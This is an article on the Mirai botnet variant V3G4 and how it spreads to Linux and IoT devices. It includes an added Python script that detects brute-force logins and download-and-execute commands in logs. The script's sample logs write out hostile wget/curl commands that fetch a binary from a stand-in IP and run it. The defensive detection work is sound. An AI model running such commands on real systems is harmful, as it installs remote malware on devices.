A newly discovered variant of the infamous Mirai botnet has emerged, exploiting multiple security vulnerabilities to spread across Linux and Internet of Things (IoT) devices. Identified in the latter half of 2022, this variant has been labeled V3G4 by researchers at Palo Alto Networks’ Unit 42. Their investigation has revealed that three separate campaigns are likely orchestrated by the same cybercriminal group.

Unit 42 researchers noted that once attackers gain control of a vulnerable device, they fully integrate it into the botnet. This lets the threat actor use the compromised devices for a range of malicious activities, particularly distributed denial-of-service (DDoS) attacks. The campaigns target unsecured Linux servers and networking equipment, exploiting up to thirteen vulnerabilities, each of which can lead to remote code execution (RCE).

Among the critical vulnerabilities exploited are those affecting widely used platforms and devices, including Atlassian Confluence Server, DrayTek Vigor routers, Airspan AirSpot, and Geutebruck IP cameras. Notably, the oldest vulnerability associated with this threat is CVE-2012-4869, an RCE flaw in FreePBX, underlining the ongoing risk posed by outdated security measures.

After successfully breaching a target, V3G4 retrieves its payload from a remote host using standard command-line tools such as wget and cURL. The botnet also checks for competing malware already present on the infected machine, terminating rival botnets such as Mozi, Okami, and Yakuza so that it alone controls the device.

This variant ships with a list of default or weak credentials, which it uses to brute-force Telnet and SSH logins on additional systems. Once installed, V3G4 connects to a command-and-control (C2) server and waits for instructions to launch DDoS attacks over various protocols, including UDP, TCP, and HTTP.
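The two behaviours described above, a burst of failed Telnet/SSH logins followed by a success, and a shell command that fetches a file with wget or cURL and runs it in the same command line, are both visible in ordinary host logs. The following is an added example, not code from the original article or from Unit 42, that runs simple detections for both over constructed sample log lines. The syslog-style sshd/telnetd messages, the "audit:" record layout carrying the command line, the hostnames and the addresses (from the TEST-NET ranges) are all assumptions made for this example.

```python
import re
from collections import Counter

# Constructed sample log lines for this example (not taken from any report).
# Lines 1-8 imitate syslog-style sshd/telnetd messages; the "audit:" lines imitate
# a generic process-execution record that carries the executed shell command line.
SAMPLE_LOGS = """\
Feb 14 10:01:02 cam01 sshd[1201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Feb 14 10:01:03 cam01 sshd[1203]: Failed password for admin from 203.0.113.7 port 51024 ssh2
Feb 14 10:01:04 cam01 sshd[1205]: Failed password for root from 203.0.113.7 port 51026 ssh2
Feb 14 10:01:05 cam01 sshd[1207]: Failed password for support from 203.0.113.7 port 51028 ssh2
Feb 14 10:01:06 cam01 sshd[1209]: Failed password for user from 203.0.113.7 port 51030 ssh2
Feb 14 10:01:07 cam01 telnetd[1211]: login failed for 'root' from 203.0.113.7
Feb 14 10:01:20 cam01 sshd[1215]: Accepted password for admin from 203.0.113.7 port 51040 ssh2
Feb 14 10:02:00 cam01 sshd[1220]: Accepted password for ops from 198.51.100.5 port 40000 ssh2
Feb 14 10:03:10 cam01 audit: uid=0 comm=sh cmd="cd /tmp; wget http://203.0.113.9/bins/x86 -O .x; chmod +x .x; ./.x"
Feb 14 10:03:11 cam01 audit: uid=1000 comm=sh cmd="curl -fsSL https://example.org/pkg.tar.gz -o pkg.tar.gz"
Feb 14 10:03:12 cam01 audit: uid=0 comm=sh cmd="curl http://203.0.113.9/bins/arm7 | sh"
"""

# Failed SSH or Telnet login, capturing the source address (assumed message formats).
FAILED_LOGIN = re.compile(
    r"sshd\[\d+\]: Failed password for \S+ from (?P<ip>[\d.]+)"
    r"|telnetd\[\d+\]: login failed for '[^']+' from (?P<tip>[\d.]+)"
)
ACCEPTED_LOGIN = re.compile(r"sshd\[\d+\]: Accepted password for \S+ from (?P<ip>[\d.]+)")
# wget/curl invocation and the first URL it is given, within one shell command.
DOWNLOADER = re.compile(r'\b(?:wget|curl)\b[^;|&]*?(?P<url>https?://[^\s"]+)')
# Signs that the fetched content is executed in the same command line.
EXEC_HINTS = re.compile(r"\|\s*(?:sh|bash)\b|chmod\s+\+x")
BARE_IP_HOST = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/")


def failed_login_sources(log_text, threshold=5):
    """Count failed Telnet/SSH logins per source address and return those at or
    above the threshold, the signature of a credential list being tried."""
    failures = Counter()
    for line in log_text.splitlines():
        m = FAILED_LOGIN.search(line)
        if m:
            failures[m.group("ip") or m.group("tip")] += 1
    return {ip: n for ip, n in failures.items() if n >= threshold}


def successes_after_failures(log_text, threshold=5):
    """Return the source addresses that produced a failure burst and then logged
    in successfully: what a working default credential looks like in the log."""
    suspects = set(failed_login_sources(log_text, threshold))
    found = set()
    for line in log_text.splitlines():
        m = ACCEPTED_LOGIN.search(line)
        if m and m.group("ip") in suspects:
            found.add(m.group("ip"))
    return found


def download_and_execute(log_text):
    """Return (url, reasons) for command lines that fetch a URL with wget or curl
    and execute the result in the same command. A bare-IP download host is
    reported as an additional, weaker indicator (a heuristic, not proof)."""
    hits = []
    for line in log_text.splitlines():
        m = DOWNLOADER.search(line)
        if not m or not EXEC_HINTS.search(line):
            continue  # plain downloads (e.g. a package fetch) are not flagged
        url = m.group("url")
        reasons = ["fetched content executed in same command"]
        if BARE_IP_HOST.match(url):
            reasons.append("download host is a bare IP address")
        hits.append((url, reasons))
    return hits


def triage(log_text, threshold=5):
    """Bundle the three checks into one report for a log excerpt."""
    return {
        "bruteforce_sources": failed_login_sources(log_text, threshold),
        "compromised_by_weak_credentials": sorted(successes_after_failures(log_text, threshold)),
        "download_and_execute": download_and_execute(log_text),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOGS).items():
        print(f"{key}: {value}")
```

Run against the constructed sample, the report names 203.0.113.7 as a brute-force source that eventually logged in, and flags the two command lines that fetch a file from a bare-IP host and execute it, while leaving the ordinary package download from example.org alone. The thresholds and patterns are deliberately simple; in production they would be fed by an auditd or EDR process-execution stream rather than by a string constant.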

Researchers emphasize that the vulnerabilities exploited by this botnet have lower attack complexity than those used by earlier variants, yet they still allow remote code execution. To reduce exposure, users should apply available patches and updates promptly and enforce strong password policies, replacing any default credentials on their devices.

In summary, the emergence of the V3G4 variant of the Mirai botnet signifies a continued evolution in the tactics employed by cybercriminal groups. Business owners must remain vigilant, continually reinforcing their cybersecurity measures to defend against these evolving threats. Utilizing frameworks like MITRE ATT&CK, which categorizes tactics such as initial access, persistence, and privilege escalation, can provide valuable insights into the operational strategies of adversaries in this ever-changing landscape of cybersecurity.
